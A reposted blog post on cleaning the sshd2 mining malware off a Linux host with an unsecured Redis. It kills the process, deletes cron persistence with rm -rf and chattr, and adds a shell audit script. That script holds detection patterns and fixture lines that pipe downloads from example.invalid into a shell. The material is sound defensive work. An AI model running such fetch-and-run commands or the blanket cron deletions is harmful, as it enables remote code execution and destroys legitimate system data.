
Solving the sshd2 mining virus (Redis with no password set; clearing the crontab scheduled task)

2022-06-23 06:54:00 zetor_ major

I was running Redis on Tianyi Cloud with port 6379 open, but at the time I had not set a password on Redis, which led to a mining virus getting in, as pictured:

For how this virus executes, refer to the article:

https://www.freebuf.com/column/211777.html

Virus script reference:

https://www.cnblogs.com/mikeguan/p/11314005.html

Solution:

One. After this virus starts, it drives the host's CPU usage to 99%.


1. Find the path of the virus binary with lsof -p pid:

2. Kill the virus process:

kill -9 pid

3. Remove the virus program files:

rm -rf /tmp/javax/*


Two. After the process is cleared it can be pulled back up by a scheduled task, which makes it more stubborn, so the scheduled task must be cleared along with the process.


Details:

1. If Linux scheduled tasks (crontab) are not used, they can be removed entirely:

  • rm -rf /etc/cron.d/root

  • rm -rf /var/spool/cron/crontabs

  • rm -rf /etc/crontab

  • Disable automatic start of the cron service:

    systemctl disable crond.service


2. If crontab is in use, clear the infected entries:

  • rm -rf /var/spool/cron/crontabs/root

  • rm -rf /var/spool/cron/root

Note: if a file cannot be deleted, run the following (this clears the immutable and append-only attributes that block deletion):

  • chattr -i /var/spool/cron/root
  • chattr -a /var/spool/cron/root

3. Check the last entries of the cron log:

cat -n /var/log/cron | tail -10

4. After the cleanup succeeds:

  • Set a password on Redis
  • Configure security groups for remotely exposed ports
  • Change the Redis bind IP (recommended)
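As an added example (not from the original post), a POSIX shell audit that checks the cron locations listed above for the kind of entry that re-launches the miner, and flags files that would need the chattr step before rm. CRON_ROOT, the function names and the indicator patterns are my assumptions; make_fixture builds a constructed tree so the audit can be tried without touching the host.

```shell
#!/bin/sh
# Added example, not from the original post: audit the cron locations the post
# clears for miner-style persistence and flag files whose immutable/append-only
# attribute defeated rm. CRON_ROOT is an assumed prefix (empty = live system).
# Locations named in the post; /var/spool/cron is walked recursively, so the
# crontabs/ subdirectory is covered too.
CRON_PATHS="/etc/crontab /etc/cron.d /var/spool/cron"
# Indicators assumed for this example: downloader piped into a shell, base64
# decoding, or anything run from /tmp (the post's /tmp/javax lands here).
SUSPICIOUS_RE='(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/tmp/[^[:space:]]+'
# scan_cron_file FILE: print "FILE:LINENO:LINE" for every non-comment hit.
scan_cron_file() {
  [ -f "$1" ] || return 0
  grep -nE "$SUSPICIOUS_RE" "$1" 2>/dev/null | grep -vE '^[0-9]+:[[:space:]]*#' \
    | awk -v f="$1" '{ print f ":" $0 }'
}
# count_suspicious FILE: number of suspicious lines (0 for a missing file).
count_suspicious() { scan_cron_file "$1" | wc -l | tr -d ' '; }
# locked_attrs FILE: echo FILE if lsattr shows i (immutable) or a (append-only).
locked_attrs() {
  command -v lsattr >/dev/null 2>&1 || return 0
  flags=$(lsattr -d "$1" 2>/dev/null | awk '{ print $1 }')
  case "$flags" in *i*|*a*) echo "$1" ;; esac
}
# audit_cron: report hits and locked files under CRON_ROOT; last line is the total.
audit_cron() {
  total=0
  for p in $CRON_PATHS; do
    [ -e "${CRON_ROOT:-}$p" ] || continue
    for f in $(find "${CRON_ROOT:-}$p" -type f 2>/dev/null); do
      scan_cron_file "$f"
      if [ -n "$(locked_attrs "$f")" ]; then echo "LOCKED (run chattr -i/-a first): $f"; fi
      total=$((total + $(count_suspicious "$f")))
    done
  done
  echo "suspicious cron lines: $total"
}
# make_fixture: constructed cron tree (not real data) for a safe dry run;
# echoes the directory to use as CRON_ROOT.
make_fixture() {
  d=$(mktemp -d) && mkdir -p "$d/etc/cron.d" "$d/var/spool/cron"
  printf '%s\n' '0 2 * * * root /usr/bin/logrotate /etc/logrotate.conf' \
    '# */5 * * * * root curl -fsSL http://example.invalid/a.sh | sh' \
    '*/10 * * * * root /tmp/javax/sshd2' > "$d/etc/cron.d/root"
  printf '%s\n' '* * * * * wget -qO- http://example.invalid/x | bash' > "$d/var/spool/cron/root"
  printf '%s\n' '30 3 * * * /usr/local/bin/backup.sh' > "$d/etc/crontab"
  echo "$d"
}
```

On a live host, source the file and run `audit_cron` with CRON_ROOT unset; to rehearse on the fixture, run `CRON_ROOT=$(make_fixture) audit_cron`.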


Copyright notice
This article was written by [zetor_ major]; please include the original link when reposting. Thank you.
https://yzsam.com/2022/174/202206230537386337.html